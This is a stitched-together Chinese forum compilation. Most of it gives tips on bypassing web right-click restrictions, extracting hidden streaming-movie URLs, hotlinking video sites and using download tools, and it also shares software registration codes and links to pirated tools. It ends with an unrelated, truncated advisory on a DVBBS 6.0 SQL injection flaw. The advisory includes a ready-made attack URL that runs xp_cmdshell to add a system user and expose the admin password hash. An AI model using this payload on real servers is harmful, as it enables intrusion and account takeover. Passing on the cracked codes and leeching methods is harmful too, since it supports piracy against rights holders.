第一种情况,出现版权信息类的,破解方法:在页面目标上按下鼠标右键,弹出限制窗口,这时不要松开右键,将鼠标指针移到窗口的“确定”按钮上,同时按下左键。松开鼠标左键,限制窗口就被关闭了,再将鼠标移到目标上松开鼠标右键,哈哈,就这样弹出了鼠标右键菜单,限制被取消了!有成就感吧!
第二种情况,出现“添加到收藏夹”的。破解方法:在目标上点鼠标右键,出现添加到收藏夹的窗口,不要松开右键,也不要移动鼠标,而是使用键盘的TAB键,移动到取消按钮上,按下空格键,这时窗口就消失了,松开右键看看,右键又恢复了!
第三种情况,超链接无法用鼠标右键弹出“在新窗口中打开”菜单的。用这一招:在超链接上点击鼠标右键,弹出窗口,不要松开右键,按键盘上的空格键,窗口消失了,这时在松开右键,右键菜单便会出现,选择其中的“在新窗口中打开”就OK了!
------------------------------------------------------------------------------------
在有的网站的在线电影是弹出一个页面,那镶了一个real的播放器,看不到下载的地址,有一个很笨但是很有效的方法可以看到rtsp地址,就是【断线】,虽然很简单,但是很有效,起码可以下载下来本地观看了!具体方法如下
可以用这个地址做试验 !
http://www.rw.uestc.edu.cn/movie/play.asp?id=428
进入页面以后先暂停,如果是通过网卡上网(如cable)的化,在win98(2k不行)的开始运行菜单里面输入winipcfg然后回车,会出现一个“ip配置”,然后按播放键,等到播放的的缓冲进度刚刚出来的时候就按“ip配置”对话框中的“全部释放”,这样就断线了,就会出现rtsp地址,原理很简单,就是让网页找到要播放的以后断线,软件会报搞出错,有了出错的地址就可以下载了!大家试试吧!
这样虽然很简单,但是很有效,大多数都可以用这个方法,大家不要忘记了,把一些片子都贴上来,一起分享吧!
Win2000下也可以释放IP的,用IPCONFIG 看看它的HELP吧 。
------------------------------------------------------------------------------
如何破解在线电影网站的电影地址
风月网http://www.fyvod.com/是一个速度很快的在线电影网,要盗链它的电影地址,
破解办法:例如要看《训练日》文件的地址
页面地址为[URL]http://202.103.220.145/display.html?ID=387[URL]
把后半部分替换成 player.html?ID=387
也就是 [URL]http://202.103.220.145/player.html?ID=387[URL]
查看源文件,控件对象是[URLmms://202.103.220.145/ [URL]
就出来了。
--------------------------------------------------------------------------------
保存在线欣赏的流媒体文件
Realplayer、Windows Media Player 可以说成了我们的左右手。
一次在一个明星网站上在线欣赏广告。有个广告很好看,想保存起来。但这不是平时经常看的rm。而是一种asx文件。点击之后,就会打开 Windows Media Player 连接网络进行播放。而将这个asx文件下载来后,一看只有300KB左右,奇怪了,一个广告怎么可能就这么一点。用记事本写篇短文也不止300 K,百思不得其解,用记事本打开asx文件看看吧。
果然不错,内容就是Html代码,稍懂HTML的网友便会知道当中最核心的是链接,如:
[URLmms://video.andylau.com/andylau/others/061901_makinggreenteatvc2_100k.asf [URL]
原来这个asx指向的是一个微软大力推广、用来和Real公司‘较量’的网络流媒体格式.asf。图象质量个人认为比rm好。
好了,现在要保存是不是很简单,对了,把前面的mms改成http,然后把他粘贴到FlashGet(网际快车)中下载吧。看到绿色波浪了吧!
-------------------------------------------------------------------------------
mms协议电影下载指南
因有些电影所采用的是mms协议,用一般的下载工具就不能用了,但可以在线观看。
但有了这个工具后就不能提心mms协议的电影不能下载的问题了。
[URL]http://chinagamelab.www9.cn4e.com/soft1000/soft/asfr.zip[URL]
或
[URL]http://www.chinawolf.com/~dodotom/tools/asfr.zip[URL]
使用方法:
解压这个压缩包,把里面的asfr.exe这个文件拷贝到你的D盘。再在运行栏里输入command(假如你是win2000的话,就在开始菜单里选择附件中的命令提示符)假如你所要下的电影地址为
[URLmms://www.chinawolf.com/~dodotom/01.asf [URL]这时你就在MS-DOS窗口中输入D:进入D盘后(因为asfr.exe在D盘)输入 asfr [URLmms://www.chinawolf.com/~dodotom/01.asf[URL](这样MS-DOS窗口中就在连接你所要下载的电影服务器,然后开始自动下载了。电影下完后在DOS窗口中会出现英文提示你已完成下载字样。这样一个mms协议的电影就被你下载下来啦。
------------------------------------------------------------------------------
下载电影的好东东
NetMoles Downlor2.4(网络鼹鼠):
最新版本:2.4
文件大小:2143KB
软件授权:共享软件
使用平台:Win9x/Me/NT/2000
最新的网络媒体下载软件,用法与“网际快车”差不多,不但支持http;ftp格式,还可下载mms的在线电影,下载速度比vcr要快。该软件具备以下功能:1.将文件分成多个部分同时下载,通过多线程,断点续传等技术最大限度地提高下载速度。2.为了有效地管理下载的文件,可以创建不同的类别,把下载的软件分类存放。3.下载的任务可以根据相应的信息进行排序,查询。4.改进FlashGet和Netants等软件对同一FTP主机的文件下载的方法(请看帮助文件)。 新版本增加对了mms/mmst/mmst协议的支持
下载地址:
[URL]http://gz.onlinedown.net/down/NetMoles_Downloader_2_4_full.rar [URL]
-----------------------------------------------------------------------------
[转贴] 下载实时播放的流节目完全教材(高、中、初级指南)
一、初级篇——下载隐藏的ASF与MWV文件
ASFRecorder V1.1是一个专门用来下载ASF、Wma、Wmv格式流文件的工具。它除了能把ASF下载回来外,也支持ASF文件的索引格式ASX文件,它能把隐藏在ASX里面的真正流部分找出来,甚至还可以设置代理等等,功能强大之余使用也非常方便。只要在其[File]菜单下面选[Open URL]再输入流节目的地址后就可以回到主界面按那个三角形符号开始下载了。
最近还出现了另外一个流节目下载软件 Stream Download Project v1.4 ,它的功能和 ASFRecorder非常的相似,一样是只支持ASF和WMV格式,一样不支持多线程下载和续传。但它毕竟是比较新的软件,在一些 Streambox Vcr都不能成功下载的情况下,用这个软件试试或者会让你有柳暗花明的感觉。
二、中级篇——下载隐藏的RM文件
Streambox Vcr不但支持点播形式的流节目也同样支持现场流节目,而且两者可以同时下载!由于它采用了独特的分析技术,所以可以把那些隐藏在ASX后的ASF文件和隐藏在SMIL文件后的RM文件找出来并进行下载。这个功能虽然在ASFRecorder里面已经实现,但真正做到实用阶段的是Streambox Vcr!另外,Streambox Vcr支持的流播放协议相当齐全,http、ftp、rtsp、mms、pnm等能数得出的协议它都全部支持并可以在下载的时候自动判别。除此之外它支持断线续传、支持定时下载、支持拖放下载等等作为下载软件必要的功能它一样没少,够吸引的吧!
三、高级篇——下载受保护的流媒体文件
对于一些隐藏得更深、保护得更完善的流文件,StreamBox vcr因找不到真实地址而无法下载。这个时候,我们就需要用另外的软件来分析、整理出真实的地址了。既然流文件用播放器能播放,那么真实地址一定是隐藏在发送到本机的网络数据包里面。所以只要用软件截获网上发送过来的数据包,然后加以分析就一定可以找得到真实地址。现在出现了一个专门是用来和StreamBox vcr等软件配合的地址嗅探软件Project URL Snooper
另外最近又发现一款不错的下载电影工具~
新的流媒体下载软件支持http/ftp/mms/mmst/mmsu协议(与Streambox Vcr相辅相成)
NetMoles Downloader 版 本 2.3 版权所有 软件发行商
软件平台 Win9x WinNT Win2000 WinME WinXP 整理日期 2002-03-25
软件授权 **
软件大小 1950KB
软件简介 NetMoles Downloader 是一支持http/ftp/mms/mmst/mmsu协议的下载软件。该软件能充分支持多代理,突破越来越多的网络限制,同时改进FlashGet和Netants等软件对同一FTP主机的文件下载的方法,使你更方便地下载各种软件。目前软件的功能包括:1.将文件分成多个部分同时下载,通过多线程,断点续传等技术最大限度地提高下载速度。2.为了有效地管理下载的文件,可以创建不同的类别,把下载的软件分类存放。3.下载的任务可以根据相应的信息进行排序,查询。4.改进FlashGet和Netants等软件对同一FTP主机的文件下载的方法。5.支持MMS协议的中文名、有密码保护的mms文件等。5.支持多代理,以及对代理的批量导入、导出、测试 1.rm格式的文件能下载下来吗?
答:当然了,用streamboxvcr就可以,这个软件的套装可以在本站找到,名字是streamboxvcrsuite1.0。
2.能将mpeg文件直接转换成wmv(wm8)格式的吗?
答:至今为止还不行,还是要经过avi的中间步骤的.....不过可以让几个软件协同工作来提高工作效率,当然你还是要准备一块大硬盘的。
3.我用StreamBox下载的ASF文件,播放时快进后退键全都失效。
答:有两个方法来解决:(1)用windows media player6.4来播放,就可以正常拖动了;(2)把asf文件用virtualdub转换成avi文件后便可以在mediaplayer7.0里看了,而且可以选段看,且不会等候,只是7.0占用资源比较高,建议还是用6.4看。
4.如何把rm文件转换为mpg文件?
答:现在还没有比较完美的解决办法,能凑合用的办法有两个:(1)用抓屏软件,例如hypercam,snagit等等,抓取播放中的video/audio成为avi文件,这个过程中可以选择codec,所以可以适当的减小avi的大小,之后可以把avi->mpg;(2)用tira直接转换rm->avi,不过你也要准备个大硬盘,因为转化出来的是没有压缩的avi。
5.wmv8中在压缩设定的时候一项叫做two-pass,是做什么用的?
答:第一次所谓的编码就是做分析。即对整个被制作的video进行扫描,以确定video中哪些镜头是相对动态,哪些镜头是相对静态!因为相对静态的片段需要的码流速率相对低甚至低很多,这样他就利用一定的算法把临近相对动态的片段部分的数据插进来。插进来的数据和一般数据一同被LOAD进BUFFER,回放的过程中再插回动态的画面中。这样就巧妙的利用时间差充分的利用带宽使得动态效果达到最好!于是所谓的first pass就是分析并判断video转换成数据流的“均衡”,然后second pass才是真正利用first pass中分析的结果开始encode!由于需要经过这两个过程所以two pass encording所需要的时间大约是普通编码时间的两倍!real在VBR和two pass技术上的成熟,所以尽管MS最近在MEDIA8中宣称也利用了以上的两种技术,但在动态的VIDEO上的表现任远远不及REAL。在大动态的镜头中体现得更加明显,MS''VIDEO8容易产生大量马塞克,而real就处理得很平滑而且动作也更连贯!
6.stream vcr应该设置怎样的代理服务器?
答:在菜单里面就有的:view->setting->proxy。
7.请问如何用把超过700Mb的asf文件切成小的asf?
答:其实最好在制作asf的时候就把这个计算好(类似于divx的bitrate的计算)。可以用asfindexer(这个软件在windows media tools4.1里面有)试试。
8.请问rm文件用什么软件编辑?
答:你只要装上了RealProducer8.5plus,就可以编辑了。菜单File-Edit RealMediafile...
9.请问怎么把多个RM文件合成一个完整的文件?用什么软件?
答:方法同上,不过在进入Edit RealMediafile里面之后要用append来追加.......
10.请问微软媒体播放器播放的影片用扫描软件抓屏,realplay的可以,但WMV等用微软媒体播放器的为何就不行呢?
答:准确来说,WMV比REALPLAY的屏幕更难捕捉,为了显示效果,两个软件都用了一些很特别的显示方法来显示图形(REALPLAY和一些机器不兼容也是因此而来,这方面有系统代码的MEDIAPLAY占的便宜实在太大了)。所以用一般的截图软件是很难截取到它们播放中的图形的,就像以前DOS下的“直接写屏”技术,比较极端的技术要抓起来麻烦多了,好在HyperSnap-DX Pro等软件的DirectX支持功能还能有时候发挥点用处,把ASF和WMV的图给搞定,但REALPLAY就没办法了。最近听说“东方影都”能支持RM文件播放时候的截图,我也没测试过,但我想如果能截就可能不是采用REALPLAY的那些显示技术了,图像质量也应该打点折扣了。大家看到我的文章上的截图了吧,呵呵我是如何截REALPLAY的呢?其实是一个笨办法,一个不算是办法的办法。。。也不好意思献丑了。
11.请教一下:用下载的ASFCUT时总提示WMVCORE.DLL是怎么回事?
答:把WINDOWS MEDIA ENCODE7装上就行了。
12.我用wm7作的.wmv,与asf有什么区别?
答:两种文件采用的codec不同,wmv一般是采用window media video/audio 7的,asf采用的一般是Microsoft MPEG4 V(3/2/1?),音频部分是windows media audio v2/1。不过现在网上有些地方的asf,wmv采用的codec有些混乱了,所以两种文件的界限也有些模糊了。
13.我用Real Producer Plus 8.5,把VCD格式转换成RM。但用Real Player 8,看时,就要我上网下载更新才能看,怎么办?
答:请下载最新版本的RealPlayer8...
14.在宽带平台下,是rm的效果好还是asf的效果好?asf能做到mpeg4的近似DVD的效果吗?
答:这个问题当初提出来的时候,争论了很久,各执一词,wmv8和rm都有支持者,看来不同的制作方法,不同的人(主观印象?),结果只能是不同了:(所以我就顺便说说自己的看法吧(我考虑的是低码率,225kbps左右),rm似乎在图像的柔和度上面下了很大的功夫,wmv8则是一上来就以图像的清晰度见长(感觉就是制作的时候把quality调到0也比rm强一点,不过似乎有些地方处理起来还是有问题,当初曾经压缩过一个游戏的avi,源文件压缩之后wmv8里面有很多的色斑,改用rm之后一切正常...
15.我用VirtualDub 1.4D在读源文件时经常出现MPEG Import Fileter:unexpected end of file在转换为AVI时经常出现sync error,为什么?
答:这个是因为你的mpg源文件不是标准的mpg格式,请用超级解霸的mpg格式处理功能进行转化,出来的mpg就可以正常使用了,也可以用M1-edit(M2-edit?)来处理.....
16.请问各位前辈,有什么方法可以预处理.mpg文件,去出错误?(当然我的.mpg copy到handdisk时并不很顺畅)
答:回答同上。
17.我用media encoder utility 8压缩的wmv的图像居然是反的,人物都大头朝下了,这是怎么回事?是不是参数设置有问题?以前用wm8 beat2很正常的呀。
答:可以参看下面微软的回答.....以下是在该产品帮助中的faq中有的:Why is my encoded video upside down when I play it back in Windows Media Player? Occasionally, encoded video will be upside down when it is played in Windows Media Player because capture card drivers interpret the packed YUV file format in different ways. (是由于捕获卡驱动解释方面的原因)Windows Media 8 Encoding Utility enables you to set a registry key that will flip the video before encoding it so that it displays correctly. By default this feature is disabled. To enable this feature, use the registry editor to locate the registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Scrunch\WMVideo\Vertical Flip Packed YUV, and then set the DWORD valuesss of this registry key to 1。(即可以将以上键值改成1解决)
18.请问怎样把asf和wmv转换成avi的文件?
答:如果可以用virtualdub1.3c(或者支持asf的1.4版也可以)打开的话,就简单了,video/audio都选择direct stream copy,然后save as成avi就可以了。不过vd好像对于asf支持的好一些,我试过对付wmv好像不行。另一种方法是用graphedit来转换,这种方法通杀wmv、asf。
19.装了windows media player7.0之后,我还可以用windows media player6.4版本么?
答:当然了。那个6.4版本已经被升级成了6.4系列的最高版本了。这个程序的位置是C:\Program Files\Windows Media Player\mplayer2.exe。
20.为何我的RealProducer8.5Plus看不到下面的一些菜单和按钮了呢?
答:这个是我自己机器上面的毛病,因为本人用的win98SE里面的字体选在“大字体“,换成“小字体“就正常了。分辨率800x600@75hz-16bit。
21.如何调整realproducer plus制作RM文件时的码率?
实际上你可以自己设定RM文件码率的!realproducer plus提供的那8种码率只是real公司预先设定好的建议值而已,而这些建议值是可以自己改的,方法是在realproducer plus的界面上选:Options->Target Audience Settings->or RealVideo Clips...->Target Bitrate->Target Bitrate!用这个方法你可以把原来默认的LAN设置码率改为1.2M,然后在producer界面处的Target Audience也选择用LAN来压缩,那么你做出来的节目就是1.2M的码率了。
22.请问要选择什么样的影像采集卡?
现在市场上的影像采集卡有很多种,但是要记住!一定要购买可以抓取AVI格式的卡,千万不要买抓取MPEG格式的卡,这可是没有办法作随选视频的,因为MPEG格式是专门制作VCD或DVD用的,但也不是说买了可以抓取AVI格式的卡,就可以作随选视频了,因为还是有些蛮便宜的影像采集卡,品质也不错,而且抓取的影片也不会有漏格,有的厂商产品使用的AVI格式的规格是自己规格,随选视频必须是Microsoft Video 1规格的AVI,不是这个规格的AVI采集卡,千万不要买,会产生许多问题。
23.请问要选择什么样的声音采集卡?
没有所谓的声音采集卡,因为声卡就可以采集声音,建议您选择品质比较好的声卡,最好是16位以上的声卡,推荐创新声卡,因为它对Windows系统会有比较好的支持。
24.微软网站一直强调Windows Media 4.x的压缩格式是MPEG4,这不就是VCD的格式吗?
MPEG是一种影片压缩格的技术,VCD则是利用MPEG1或MPEG2的压缩技术来制作,而DVD是利用MPEG2的技术来制作,这次Windows Media 4.x的技术是使用MPEG4,这不是微软的专利,是经由全球各大厂商组织协会制定出来的,未来使用MPEG4的压缩技术来制作影片的产品一定会很多,原因是这个规格的影片品质及文件大小都非常精致,所以并不排除以后VCD或DVD会使用MPEG4。
25.为什么要学习影片编辑软件?
很多时候我们可以直接使用Windows Media Tools抓取随选视频或音频(ASF网络影片或声音),但更多时候,可能取得经过编辑过得影片来源,譬如说我们要拍摄公司简介、商品简介或者教学记录等等,通常是东拍一段西拍一段,然后经过影片编辑软件抓取影片及剪辑影片,所以学习影片编辑软件是十分重要的,一般只需能进行影片的编辑就可以了,不需要学到电视、电影的高*技术。
26.流媒体整个制作流程是什么?
这个流程分为3个方式:
A.需要拍摄影片或录制声音之后再作随选视频或音频
流程为:拍摄影片或录制声音→到电脑上采集影片或声音→使用影片编辑软件编辑影片和声音→输出编辑完成的影片和声音→到Windows Media Encoder软件转换成网络影片或声音→放置影片和声音到网络上→制作Homepage来连接完罗影片或声音。
B.如果已经有影片或声音来源,可以直接抓取随选视频或音频
流程为:将来源和影片装到放映设备上→到Windows Media Encoder软件直接抓取成网络影片和声音→放置影片或声音到网络上→制作Homepage来链接网络影片和声音。
C.影片和声音的网络Live直播
流程为:将来源的影片和声音装到放映设备上(或架设摄像机并连接到电脑)→利用Windows Media Encoder软件直接抓取成网络影片或声音→设定Windows Media Server→制作Homepage并连接到网络Live影片或声音。
27.安装软件一定要有顺序吗?
最好按顺序安装IE→Powerpoint 2000→Adobe Premiere 6→Media Play→Media Tools→Media on-demand Producer→Media Server。
28.如何调整realproducer plus制作RM文件时的码率?
实际上你可以自己设定RM文件码率的!realproducer plus提供的那8种码率只是real公司预先设定好的建议值而已,而这些建议值是可以自己改的,方法是在realproducer plus的界面上选:Options->Target Audience Settings->or RealVideo Clips...->Target Bitrate->Target Bitrate!用这个方法你可以把原来默认的LAN设置码率改为1.2M,然后在producer界面处的Target Audience也选择用LAN来压缩,那么你做出来的节目就是1.2M的码率了.
一点意见.
通常rar的文件要winrar这个软件来解压缩.有些文件用winrar分割,但是应该有一个头文件,后醉应该是exe,不过要全部下载完才能打开,小技巧:解压缩时候会生成临时文件,它的大小是0,可是能用播放器放.不过保存有点问题了。
后缀为.000 .001 .002 .....的文件如何解压?
应该用合并工具先合并。
可以用,
软件名称:HJSplit
最新版本:2.2
文件大小:168KB
软件授权:免费软件
使用平台:Win95/98/NT/2000
发http://www.freebyte.com ;;;
原版下载:不需要
软件简介:
小巧好用的文件分割工具,能分割任何类型文件和任
何大小。也能将下载回来的分割文件合并!
[菜鸟必读]极限下载秘技[公告][建议]
从网上下载,听起来容易,但想真正成为高手,就要做到“下别人之不能下,载别人所不会载”,其中的门道可并不简单。
提到下载,很多人都认为所谓的Download不过是从网上把软件或MP3复制到硬盘中的一个过程。然而,如果真用这个标准来衡量的话,恐怕把全世界网民至少能数出几亿个下载高手来。可实际上,下载包含的内容远不止于此。从理论上讲,即使是浏览普通的网页也应该算是下载的一种,何况去下载软件、音乐、图书等更精彩的资源了。网络的开放性不断吸引着人们去寻找对自身有价值的东西,而各种商业网站又为了自身的利益,不断依靠“先进”技术使它们提供的资源逐渐封闭化。为了下载一个软件而打开三层页面的网站并不少见,而更多的图库站点更需要您不断点击大大小小的链接才肯露出庐山真面目;说是免费阅读图书,又不让您下载,给您一个连抓图都不支持的Java窗口,慢慢看去吧!(估计等您把书看完,您的网费开销能买十本原版书了。)有人说,网上的免费是糖衣炮弹:想下载软件,请您看广告;想聊天,请您看广告;想要免费信箱,请您看广告(更有附加在您每封邮件末尾的广告)。还有,某些精彩的Flash动画、Real影片以及各种在线播放的音频和视频,更是“只可远观而不可亵玩焉”——不支持下载!
难道就没有把糖衣吃掉再抛弃炸弹的方法吗?当然有!正所谓魔高一尺,道高一丈。对付特别的站点就要使用特别的方法,才能获取某些平时无法取得或者十分难以取得的资源。您想下载嵌在网页里的Flash动画吗?您想下载只提供在线播放的Real格式电影吗?您想下载收费的电子图书吗?您想学习更强大的超批量下载技巧吗?那就千万不要错过下面的文字,这就是——极限下载秘技!
获取真实的下载地址
工欲善其事,必先利其器,我们当然不必去研究如何更加科学地使用IE的下载窗口,因此您至少需要下面两个流行的下载软件之一:网际快车FlashGet(推荐使用)或网络蚂蚁NetAnts。
作为一个网民,笔者有时不得不向朋友提供某个软件的下载地址,然而这就出现了一个关于真实下载地址的问题。
首先,对同一个软件,我这儿有两个下载地址http://download.sina.com.cn/scgi ... oad/fm311ch0108.exe。如果是您的话,您更愿意接受哪个呢?很显然,后者是一个典型的URL,它相对于第一个地址来说更加明显,也不容易写错。而实际上这两个地址所指向的是同一个文件,它们在实质上毫无差别。那么如何才能获得真实的下载地址呢?
FlashGet的“重新定位到”。 网络蚂蚁的“重新定向”。
当您采用软件来下载时,一般都会在下载任务栏下面出现一个进度指示区。以FlashGet为例,所谓的“图表/日志”就表示着指定任务的下载进程。细心的朋友可能会发现,各种下载软件在把任务进行分段下载时,其中的每一段都会有详细的进度说明。在下载任务添加完毕后,点击“图表/日志”下方的“Jet 1”,您会看到下载信息中经常会出现这样一行文字:“重新定位到……”。实际上,这个重新定位的目的地就是该任务的真实下载地址。无论您原始的下载地址是像上面例子那么长的一大串字母和符号,还是一个ASP地址或者别的什么,只要您认准“重新定向”的位置,保证真实的下载地址原形毕露!另外,网络蚂蚁也具备相关的功能,其重新定向的位置以“Location”表示。
也许您会问,“知道了真实的下载地址,又有什么用?”没关系,这只是一个预备知识,您现在只要掌握这个技巧就好,一会儿会用到的。
疯狂下载连锅端
必须承认,这个部分的内容是关于一种极度疯狂的下载行为的,然而它又比用WebZip这样的软件去下载站点理智一些。毕竟像WebZip那种通过下载页面的层数来控制下载的信息量,这种行为无论怎么看也是非常值得怀疑的——天知道您的站点有多少个层次!那么,如果您只是为了得到几个软件,就在WebZip的地址栏http://www.download.com.cn”,这也未免太小题大做了,况且为了让我刚才说的“获得真实下载地址”的技巧看起来比较有用,就把这个疯子般的下载术放在脑后吧。下面让我来告诉您,如何最快速地得到更多有用的东西……
以国内著名的下载站点“中国http://www.download.com.cn)为例,我们首先通过上述的方法,使用下载软件查出了某个软件的真实下载地址(过程我就不重复了ftp://ftp.download.com.cn/pub/new_tools/sunglass.zip),然后只要稍作处理就可以让它变得有用:这个地址去掉了末尾的文件名ftp://ftp.download.com.cn/pub/new_tools/”,所表示的含义就是该软件的目录。下面,您可以打开IE浏览器,输入这个目录地址,就会立刻看到与我们要下载的软件处于同一个目录下的其他所有软件。
所有的软件都出现在这个窗口中。
如果您是一个新软件的试用者,那您可有福了。直接把想要的软件拖拽到Windows的窗口中,下载过程自动完成,连下载工具都省了。然而,您更可以通过FTP站点的目录结构游走整个中国下载站点,把所有软件尽收眼底,尽情下载吧。
对于其他FTP站点的地址,此方法依然适用。因为大部分FTP站点都是支持匿名登陆的,但匿名用户的权限一般都是“只读”,也就是说您可以任意下载FTP站点中的任何软件,却不能上传或删除任何东西。不过对于下载狂人来说,这足够了。怎么样?这种疯狂的“连锅端”下载技巧令您感受到下载的快感了吗?
吝啬鬼下载术
相对于疯狂的端站点技巧,还有一种细致得锱铢必较的令宽带上网或公款上网用户不屑一顾却让饱受拨号上网龟速之苦的群众欢欣鼓舞而津津乐道的——吝啬鬼下载术。
如果经常下载软件的话,您会发现从网上下载到的软件大多是zip格式的。这样做一来为了节省宝贵的服务器空间,二来可以减少下载软件的信息传输量;然而之所以用zip格式进行压缩却很少用到rar和ace这些压缩格式,则主要是因为zip的普及程度高。可是您发现没有,当您把辛辛苦苦下载回来的zip包打开的时候,是否会发现有很多与应用程序无关的文件呢?比如站长们为自己打的小广告啦,根本看不懂的英文Readme啦……如果能把没用的家伙们统统排斥在外,您是否会感到一点点轻松呢?还有这种情况:朋友把许多文件都压缩成一个体积巨大的zip并传到网上,而您现在只需要其中的一个小文件,怎么办呢?
Zip预览的功能在左下角。
有Download Mage就没问题了。这个简明的下载程序虽不如FlashGet那样知名,但它的最大特点就是能事先预览要下载的zip压缩包中的文件,然后您可以选择哪个文件下载,哪个文件不下载,把不受欢迎的文件排除掉,下载不就更轻松了吗?
Download Mage也能像FlashGet那样直接截获IE中的URL并展开下载,但需要您先在它的Setup标签中启用IE支持插件(Install IE Support),当然Netscape也是可以被支持的。接下来,只要您从浏览器中点击任意的软件下载链接,Download Mage就会自动弹出并准备开始下载。此时点击左下角的Zip预览(Zip Preview)按钮,您就可以清楚地看到该Zip压缩包中有多少个文件,各自的大小是多少。按住Ctrl键复选您想要下载的文件,再确保“Download Selected Files(下载选定的文件)”被勾中后,按回车键即可开始这吝啬鬼般的下载术了!
Zip压缩包中的文件清晰可见。
那么,到这里为止,最疯狂和最保守的下载方法都有介绍了,下面就来点更高深的技巧吧!
超批量下载
所谓的“批量下载”实际上是下载工具的一项普通功能。下载程序通过分析页面上的各种链接,把所有可能下载的文件都罗列出来。这时您只需简单地选择需要下载的文件,或者通过文件类型进行批量选择某种文件,之后下载的任务就完全交给程序了。看,就是如此简单的一个功能,却能省去我们大量不必要的重复劳动。但是目前实际的应用情况却是:网站为了增加浏览量,竟然给每张图片都制作一个html页面,或者再来个专门的鉴赏页什么的,结果反倒大大增加了用户的负担。要知道很多人都希望能尽快收集到更多的优质图片,但是如此的收集方法是不是太麻烦了呢?
我们不妨先来看一个例http://www.51m.com/pic/2/best124.htm,这是一个典型的图库下载页面。按照每个缩略图所指向的链接,不难发现我们只有逐个打开每张图片所在的页面,才能看到并且保存相应的图片。如果您还是觉得不直观的话,那么我就在这里使用“批量下载”,看看会出现什么效果。
批量下载。
在页面上点鼠标右键,选择“使用网际快车下载全部链接”,于是出现所有由FlashGet探索到的可供下载的文件。仔细观察一下就不难看出,其中没有任何图形文件!也就是说普通的批量下载在这里完全不起作用。
批量下载不行,怎么办?
显然,您需要一种更好的批量下载的方法,来帮助您提高下载的效率。下面就要看FlashGet的绝技了。0.94版本以后的FlashGet增加了一项非常诱人的功能:站点资源探索器。它能够沿着您提交的URL尽可能找到所有可以下载的文件,启动站点资源探索器的快捷键是F7。
下面,在网站资源探索器的地址栏中键入刚才那个网址并按回车……您看到什么了?是不是出现了一些jpg图片?如果您觉得这些图片排列得不够明显,就点击一下“类别”栏目,这下明显了吧?选中这些图片,点击工具栏上的“下载”,那么您就连URL都不用*心了,FlashGet会自动为您下载这些图片!
资源一旦被探索到,就可以被FlashGet下载。
这就是强大的“超批量下载”,您觉得这个技巧好用吗?相信在实际的应用过程中,您一定能逐渐体会到它的优越性
如何看电影和一些必备工具
首先声明,不要对我说连接无效的话,因为时间过了多天。我想你可以在收缩引擎中寻找,很多的,我要是有空间当然可以提供,可惜我没有,sorry。
电影.asf .mpeg结尾的文件用media player观看
ram,rm结尾的用realplayer观看
realplayer加强版,注册码:1116-11-0060
http://66.54.221.196/tool/real.exe ;;;
有的mpeg和ask的文件是DIVX编码的需要DIVX插件,安装插件后才能用media player观看
这里斑竹推荐一个专用看DIVX的player,占用系统资源更少
http://66.54.221.196/tool/player.exe ;;;
文件结尾r01 r02 exe这种是一个大文件用winrar分割成为若干小块,需要用winrar合并后才能观看,winrar
http://66.54.221.196/tool/wrar271.exe ;;;
文件结尾001 002 003这种是用hjsplit分割的文件,需要用hjsplit合并后观看
http://66.54.221.196/tool/hjsplit.zip ;;;
mms://这种是media player的在线播放协议,可以直接在线观看,下载要用VCR
用法和flashget蚂蚁等差不多
http://66.54.221.196/tool/vcr10b3.zip这个地址可能坏了.我没有空间上传.它有500k左右.文件名是vcr.exe请用收琐引擎自己找.sorry
rstp://这种是realplayer的在线播放协议,可以直接在线观看下载要用VCR
用法和flashget蚂蚁等差不多
制作工具
RealProducer Plus v8.5(内含注册码)
这是Real公司出品的RM制作最强大的软件了。千万记住 RealProducer 这个软件有很多版本,一定要用 Plus 版的!!!是同类软件中最好用的,软件容量不大,功能专业专一而强大,又是Real公司这个RM的鼻祖出品的,非常好的制作RealMovie的软件。
http://66.54.221.196/tool/plus.zip ;;;212-09483-1266
Real格式文件压缩至尊v1.40注册版
软件大小:2448K
更新时间:2001-5-12
注册码:TianYusoftware is good
下载&nbsftp://61.139.37.147/rj/soft/tyureal.exe ;;;
把两个MPG合成一个MPG的方法
用dos下
copy /b 1.mpg+2.mgp final.mpg
如何合并多个内容连续的rm文件?
与分割RM一样,用RealProducer Plus 软件
File->Edit Realmedia File,打开Realmedia Editor,然后File->Open Realmedia File,从目录中找到要合并的第一个RM文件并打开,接着File->Append Realmedia File,从目录中选要合并的第二个文件并打开,如有第三第四类推,这时已经合并好了,File->Save Realmedia File As,取个名字,哈哈,大功告成
创建时间:2003-05-01
文章属性:原创
文章来源:灰色轨迹
文章提交:
PsKey (PsKey_at_hotmail.com)
PsKey<PsKey@hotmail.com>
www.isgrey.com>>>Dedicated This Scrap To CaoJing<<<
涉及版本:
^^^^^^^^^^
DVBBS VER 6.0.0 &DVBBS VER 6.0.0 SP1&DVBBS VER 6.0.0 SP2<ACCESS&MSSQL>
//低版本没看,反正低版本的问题成堆,也不少这一个-)
描述:
^^^^^^
DVBBS是一款由
WWW.ASPSKY.NET开发和维护的源代码开放的Asp论坛;由于其tongji.asp文件没有过滤用户提交传递给SQL查询的输入,导致远程攻击者可以利用这个漏洞进行SQL注入攻击,进而威胁论坛或服务器安全。
具体:
^^^^^^
DVBBS经analysist加固后,消除了大批安全隐患,并引入了很多的安全措施,如果大家对编写安全的Asp代码有兴趣,DVBBS将是一个很好的参考!虽然Asp语法简单,出现问题的情况也就那么几种。小型Asp程序中,程序员只要稍微有点安全意识就可以避免出现漏洞;但在较大规模的纷杂的程序中,难免出现遗漏,而只要有一个缺陷存在,系统安全就得不到保障。说了这么多废话,我们转入正题,问题其实很简单,看代码:
---------------------------------------------------------
6 if request("orders")=1 then
7 call tongji()
8 elseif request("orders")=2 then
9 call topuser()
...
60 sub topuser()
61 set rs=server.createobject("adodb.recordset")
62 sql="select top "&request("n")&" username,useremail,userclass,oicq,homepage,article,addDate from [user] order by article desc"
---------------------------------------------------------
很明显吧?(你怎么就没发现呢~呵呵),变量 n 没有经任何检查就直接放到SQL查询中了。
攻击方法:
^^^^^^^^^^
1:MSSQL
如果是MSSQL版的,还客气什么,直接提交如下URL:
http://www.target.com/asp/dvbbssql/tongji.asp?orders=2&N=2%20password%20from%20admin;%20exec%20master..xp_cmdshell%20'net%20user%20love%20hack%20/add'%20--顺利的话,对方系统便会添加love/hack用户,顺便还可以看到论坛管理员的经MD5加密后的密码字符串(FT,系统用户都添加了,论坛管理员算什么?),由于本文不是sql injection教学,就此打住。
2:ACCESS
如果是ACCESS版的,哈哈,很多朋友紧张起来了,看看tongji.asp下面的代码:
---------------------------------------------------------
